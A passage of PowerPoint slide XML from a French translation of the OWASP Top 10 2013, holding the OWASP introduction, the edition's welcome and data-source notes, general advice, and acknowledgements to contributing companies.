                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Et</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> bien plus… le tout sur </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t>www.owasp.org/</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="227013" marR="0" indent="-114300" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFont typeface="Arial" charset="0"/>
                        <a:buChar char="•"/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Y compris : </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId10"/>
                        </a:rPr>
                        <a:t>www.owasp.org/index.php/Top_10</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="90000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="fr-FR" sz="500" noProof="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fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>L’accès à tous les outils, documents</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> et</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> forums</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> de l’OWASP est gratuit et ouvert à toute personne intéressée par l’amélioration de la sécurité des applications. Nous préconisons une approche sécurité des applications en tant que problème de personnes, de processus et de technologie, parce que les approches les plus efficaces pour la sécurité des applications nécessitent des améliorations dans tous ces domaines.</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>L’OWASP est une</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> organisation d’un nouveau genre. Notre liberté vis-à-vis des pressions commerciales nous permet de fournir une information impartiale, pratique et rentable de la sécurité applicative. L’OWASP n’est liée à aucune entreprise technologique, bien que nous soutenions l'utilisation éclairée de technologies de sécurité commerciale. Semblable à de nombreux projets logiciels open-source, l'OWASP produit de nombreux types de supports dans un esprit collaboratif et ouvert.</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>La Fondation OWASP est l’entité à but non-lucratif qui assure le succès</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> à long terme du projet. Presque tous ceux associés à OWASP sont volontaires, y compris le </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>Board</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>, les Comités globaux, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>Chapter</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> Leaders, Chefs de Projets et les Membres. Nous soutenons la recherche de sécurité innovante avec des subventions et des infrastructures.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Rejoignez nous !</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>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ustDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="669652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558192510"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="1066800"/>
          <a:ext cx="6858000" cy="2606040"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="6858000"/>
              </a:tblGrid>
              <a:tr h="381000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1600" b="1" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Bienvenue</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1600" b="1" noProof="0" dirty="0">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1971107">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000" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Bienvenue dans cette édition 2013 du Top 10 de l’OWASP! Cette nouvelle version introduit deux catégories étendues par rapport à la version 2010 afin d'inclure d'importantes vulnérabilités. Elle propose également une réorganisation des risques, basée sur leur prévalence. Enfin, une nouvelle catégorie de risque voit le jour:</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>la sécurité des composants tiers. Ces risques, référencés sous « A6 – Mauvaise configuration sécurité » dans la version 2010, ont désormais une catégorie </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>dédiée.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="600"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Le </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Top 10 2013 de l'OWASP est basé sur 8</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> jeux de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>données de 7 entreprises spécialisées dans la sécurité des applications, dont 4 sociétés de conseil et 3 fournisseurs d'outils ou</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> de services </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>SaaS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> (1 statique, 1 dynamique</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> et 1 statique et dynamique</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>). Ces données couvrent plus 500 000 vulnérabilités à travers des centaines d'organisations et des milliers d'applications. Les 10 catégories de risques couvertes par le Top 10 sont sélectionnées et hiérarchisées en fonction de leur fréquence,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>de leur exploitabilité, de leur détectabilité et de leurs impacts potentiels.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>L’objectif principal du Top 10 de l’OWASP est de sensibiliser les développeurs, concepteurs, architectes, décideurs, et les entreprises aux</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>conséquences des faiblesses les plus importantes inhérentes à la sécurité des applications web. Le Top 10 fournit des techniques de base pour se protéger contre ces domaines problématiques à haut risque – et fournit des conseils sur la direction à suivre.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1000" u="none" baseline="0" noProof="0" dirty="0" smtClean="0"/>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22171532"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="0" y="3657601"/>
          <a:ext cx="3352800" cy="5486399"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3352800"/>
              </a:tblGrid>
              <a:tr h="344420">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1600" b="1" kern="1200" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Avertissements</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1600" b="1" kern="1200" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="lt1"/>
                        </a:solidFill>
                        <a:latin typeface="+mj-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5141979">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Ne vous arrêtez pas à 10! </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Il</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="0" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> y a des centaines de problèmes qui pourraient influer sur la sécurité globale d’une application web comme indiqué dans le</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="0" kern="1200" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>Guide du développeur de l’OWASP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="0" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> et la série des </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>OWASP Cheat Sheets</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="0" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>. Ce se sont des lectures essentielles pour quiconque développe des applications web. Des conseils sur la manière de trouver des vulnérabilités dans les applications web sont fournis dans le </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>Guide de Test</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="0" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> et le </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>Guide d’audit de Code</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="0" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="1" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Changement constant.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> Ce Top 10 évoluera dans le temps. Même sans modifier une seule ligne de code de votre application, cette dernière peut déjà être vulnérable à une attaque à laquelle personne n’a pensé auparavant. Veuillez prendre connaissance des conseils à la fin de ce document dans </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>les sections relatives aux développeurs, vérificateurs et entreprises </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>pour plus d’information.</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1000" noProof="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Pensez</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="1" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> positif! </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Quand vous serez prêt à arrêter de chasser les vulnérabilités et à vous concentrer sur l’établissement de contrôles solides de sécurité des applications, l’OWASP a publié le </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>Standard de Vérification de Sécurité Applicative (ASVS) </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>comme guide pour les entreprises et les auditeurs d’applications sur ce qu’il faut vérifier. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="600"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="1" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Utilisez les outils sagement!</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> Les failles de sécurité peuvent être complexes et enfouies dans le code source. Dans la plupart des cas, l’approche la plus rentable pour trouver et éliminer ces faiblesses reste l’humain doté de bons outils.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="1" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Allez</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" b="1" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> plus loin!</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> Faites de la sécurité une partie intégrante de la culture de votre entreprise. Pour en savoir plus, consultez </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t>Open Software Assurance Maturity Model (SAMM)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> et </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId10"/>
                        </a:rPr>
                        <a:t>Rugged Handbook</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx2"/>
                        </a:solidFill>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624722142"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3429000" y="3657600"/>
          <a:ext cx="3429000" cy="5486400"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr bandRow="1">
                <a:tableStyleId>{D27102A9-8310-4765-A935-A1911B00CA55}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="3429000"/>
              </a:tblGrid>
              <a:tr h="343829">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1600" b="1" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Remerciements</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1600" b="1" noProof="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>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5142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700" kern="120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000" kern="1200" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Nos remerciements à </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" noProof="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId11"/>
                        </a:rPr>
                        <a:t>Aspect Security</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>  pour avoir</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> initié, piloté et mis à jour le Top 10 de l’OWASP depuis sa création en 2003, et à ses principaux auteurs: Jeff Williams et Dave </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" noProof="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>Wichers</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200"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000" kern="120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sz="1000" kern="120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sz="1000" kern="120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sz="1000" kern="120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sz="100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000" noProof="0" dirty="0" smtClean="0"/>
                        <a:t>Nous voudrions</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> remercier les entreprises qui ont contribué à supporter la mise à jour 2013 en fournissant leur données sur la fréquence des vulnérabilités:</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                      </a:br>
                      <a:endParaRPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>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fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId11"/>
                        </a:rPr>
                        <a:t>Aspect Security</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> </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fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId12"/>
                        </a:rPr>
                        <a:t>HP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0"/>
                        <a:t> (résultats issus des produits </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" baseline="0" noProof="0" dirty="0" smtClean="0">
                          <a:hlinkClick r:id="rId13"/>
                        </a:rPr>
                        <a:t>Fortify</a:t>
                      </a:r>
                      <a:r>
